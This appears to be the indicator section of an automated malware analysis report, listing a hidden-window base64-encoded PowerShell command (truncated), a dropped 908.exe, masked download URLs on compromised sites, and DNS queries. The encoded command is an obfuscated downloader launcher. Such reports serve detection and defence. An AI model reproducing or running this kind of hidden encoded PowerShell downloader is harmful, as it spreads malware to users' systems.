Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAByAG8AbwB5AGcAdQB1AHEAdQA9ACcAawB1AGEAcABjAGEAZQBmAHAAbwBvAHAAJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAUwBgAGUAYABDAFUAUgBgAGkAdABZAGAAUAByAG8AVABPAG...
- %HOMEPATH%\908.exe
- %HOMEPATH%\908.exe
- http://be####mstudio.co.uk/wolfsohn.co.uk/OrGj49j25c0151/
- http://be###nger.com/weightloss/RUi/
- http://be###nger.com/cgi-sys/suspendedpage.cgi
- http://www.as######pirationcooking.com/wp-content/5ttpb519/
- http://av#####emille-iles.com/cgi-bin/c0tu7684941/
- http://www.av#####emille-iles.com/cgi-bin/c0tu7684941/
- DNS ASK be####mstudio.co.uk
- DNS ASK az###apedia.com
- DNS ASK be###nger.com
- DNS ASK as######pirationcooking.com
- DNS ASK av#####emille-iles.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAByAG8AbwB5AGcAdQB1AHEAdQA9ACcAawB1AGEAcABjAGEAZQBmAHAAbwBvAHAAJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAUwBgAGUAYABDAFUAUgBgAGkAdABZAGAAUAByAG8AVABPAG...' (with hidden window)